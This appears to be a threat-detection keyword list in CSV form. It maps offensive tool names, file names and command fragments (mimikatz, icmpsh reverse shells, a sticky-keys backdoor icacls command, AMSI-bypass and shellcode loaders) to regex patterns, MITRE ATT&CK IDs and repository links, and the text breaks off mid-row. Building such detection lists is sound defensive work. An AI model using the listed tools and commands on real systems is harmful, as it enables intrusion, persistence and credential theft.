"*I2lmbmRlZiBQSU5HT09SCiNkZWZpbmUgUElOR09PUgoKI2RlZmluZSBTRVJWRVJJUCAiM*",".{0,1000}I2lmbmRlZiBQSU5HT09SCiNkZWZpbmUgUElOR09PUgoKI2RlZmluZSBTRVJWRVJJUCAiM.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*i2pinstall*",".{0,1000}i2pinstall.{0,1000}","offensive_tool_keyword","I2P","I2P - The Invisible Internet Project.","T1048.001 - T1568.003","TA0011 - TA0040","N/A","N/A","Data Exfiltration","https://geti2p.net/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*iam__enum_assume_role/default-word-list.txt*",".{0,1000}iam__enum_assume_role\/default\-word\-list\.txt.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*iAmAnIndependentStrongPassswordThatNeedsToBeSecure*",".{0,1000}iAmAnIndependentStrongPassswordThatNeedsToBeSecure.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1109","239","2024-03-13T21:35:11Z","2017-10-23T14:43:59Z" "*iamlordvoldemort@31337schoolofhackingandwizardry.com*",".{0,1000}iamlordvoldemort\@31337schoolofhackingandwizardry\.com.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*iammaguire/Gotato*",".{0,1000}iammaguire\/Gotato.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","1","N/A","9","2","113","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*IAS -Process *aad3b435b51404eeaad3b435b51404ee*",".{0,1000}IAS\s\-Process\s.{0,1000}aad3b435b51404eeaad3b435b51404ee.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*IAS -Process {GNLPH}*$excludedUsernames=@(""Guest*DefaultAccount*WDAGUtilityAccount*",".{0,1000}IAS\s\-Process\s\{GNLPH\}.{0,1000}\$excludedUsernames\=\@\(\""Guest.{0,1000}DefaultAccount.{0,1000}WDAGUtilityAccount.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*ibmiscanner2john.py*",".{0,1000}ibmiscanner2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*ibnejdfjmmkpcnlpebklmnkoeoihofec*",".{0,1000}ibnejdfjmmkpcnlpebklmnkoeoihofec.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*IBurpExtender.java*",".{0,1000}IBurpExtender\.java.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","150","39","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z" "*IBurpExtenderCallbacks.java*",".{0,1000}IBurpExtenderCallbacks\.java.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0010 - TA0007 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","150","39","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z" "*icacls c:\windows\system32\sethc.exe*",".{0,1000}icacls\sc\:\\windows\\system32\\sethc\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*icebreaker:P@ssword123456*",".{0,1000}icebreaker\:P\@ssword123456.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*icebreaker-master.zip*",".{0,1000}icebreaker\-master\.zip.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*icebreaker-scan.xml*",".{0,1000}icebreaker\-scan\.xml.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*IcebreakerSecurity/DelegationBOF*",".{0,1000}IcebreakerSecurity\/DelegationBOF.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","10","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*IcebreakerSecurity/DelegationBOF*",".{0,1000}IcebreakerSecurity\/DelegationBOF.{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*IcebreakerSecurity/PersistBOF*",".{0,1000}IcebreakerSecurity\/PersistBOF.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","247","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" "*ice-wzl/wmiexec2*",".{0,1000}ice\-wzl\/wmiexec2.{0,1000}","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","20","1","2023-12-27T03:54:26Z","2023-02-07T22:10:08Z" "*icmpBackdoor*",".{0,1000}icmpBackdoor.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*ICMP-ReceiveFile.py*",".{0,1000}ICMP\-ReceiveFile\.py.{0,1000}","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","3","294","60","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z" "*Icmp-Redirect.py*",".{0,1000}Icmp\-Redirect\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*ICMP-SendFile.py*",".{0,1000}ICMP\-SendFile\.py.{0,1000}","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","3","294","60","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z" "*icmpsh.exe*",".{0,1000}icmpsh\.exe.{0,1000}","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","10","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*icmpsh.exe*",".{0,1000}icmpsh\.exe.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*icmpsh.git*",".{0,1000}icmpsh\.git.{0,1000}","offensive_tool_keyword","icmpsh","Simple reverse ICMP shell","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/bdamele/icmpsh","1","1","N/A","10","10","1520","414","2018-04-06T17:15:44Z","2011-04-15T10:04:12Z" "*icmpsh_m.py*",".{0,1000}icmpsh_m\.py.{0,1000}","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","10","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*icmpsh_m.py*",".{0,1000}icmpsh_m\.py.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*icmpsh-m.*",".{0,1000}icmpsh\-m\..{0,1000}","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","10","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*icmpsh-m.c*",".{0,1000}icmpsh\-m\.c.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*icmpsh-m.pl*",".{0,1000}icmpsh\-m\.pl.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*icmpsh-master*",".{0,1000}icmpsh\-master.{0,1000}","offensive_tool_keyword","icmpsh","Simple reverse ICMP shell","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/bdamele/icmpsh","1","1","N/A","10","10","1520","414","2018-04-06T17:15:44Z","2011-04-15T10:04:12Z" "*icmpsh-s.*",".{0,1000}icmpsh\-s\..{0,1000}","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","10","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*icmptunnel*",".{0,1000}icmptunnel.{0,1000}","offensive_tool_keyword","icmptunnel","icmptunnel works by encapsulating your IP traffic in ICMP echo packets and sending them to your own proxy server. The proxy server decapsulates the packet and forwards the IP traffic. The incoming IP packets which are destined for the client are again encapsulated in ICMP reply packets and sent back to the client. The IP traffic is sent in the 'data' field of ICMP packets.","T1041 - T1001 - T1570","TA0011","N/A","N/A","Defense Evasion","https://github.com/s-h-3-l-l/katoolin3","1","0","N/A","N/A","4","336","112","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" "*icyguider/LightsOut*",".{0,1000}icyguider\/LightsOut.{0,1000}","offensive_tool_keyword","LightsOut","Generate an obfuscated DLL that will disable AMSI & ETW","T1027.003 - T1059.001 - T1082","TA0005 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/icyguider/LightsOut","1","1","N/A","10","4","304","43","2023-06-09T10:39:36Z","2023-06-01T14:57:44Z" "*icyguider/Shhhloader*",".{0,1000}icyguider\/Shhhloader.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","1","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*id::modify*",".{0,1000}id\:\:modify.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*IDiagnosticProfileUAC.git*",".{0,1000}IDiagnosticProfileUAC\.git.{0,1000}","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","1","N/A","10","2","175","31","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z" "*IDiagnosticProfileUAC-main*",".{0,1000}IDiagnosticProfileUAC\-main.{0,1000}","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","1","N/A","10","2","175","31","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z" "*Idov31/Jormungandr*",".{0,1000}Idov31\/Jormungandr.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","210","26","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" "*Idov31/Nidhogg*",".{0,1000}Idov31\/Nidhogg.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","1","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*idrac_default_pass.txt*",".{0,1000}idrac_default_pass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*idrac_default_user.txt*",".{0,1000}idrac_default_user\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*IDSyscall.exe*",".{0,1000}IDSyscall\.exe.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","275","41","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*IDSyscall.sln*",".{0,1000}IDSyscall\.sln.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","275","41","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*IDSyscall.vcxproj*",".{0,1000}IDSyscall\.vcxproj.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","275","41","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*IDSyscall/IDSyscall*",".{0,1000}IDSyscall\/IDSyscall.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","275","41","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*IDSyscall\IDSyscall*",".{0,1000}IDSyscall\\IDSyscall.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","10","3","275","41","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*ie_execcommand_uaf.rb*",".{0,1000}ie_execcommand_uaf\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ie_win_fakenotification-clippy*",".{0,1000}ie_win_fakenotification\-clippy.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*ie_win_htapowershell.*",".{0,1000}ie_win_htapowershell\..{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*ie_win_missingflash-prettytheft*",".{0,1000}ie_win_missingflash\-prettytheft.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*iepv.exe /stext *",".{0,1000}iepv\.exe\s\/stext\s.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*IERMTCBpbnRvIHByb2Nlc3MgOiA=*",".{0,1000}IERMTCBpbnRvIHByb2Nlc3MgOiA\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 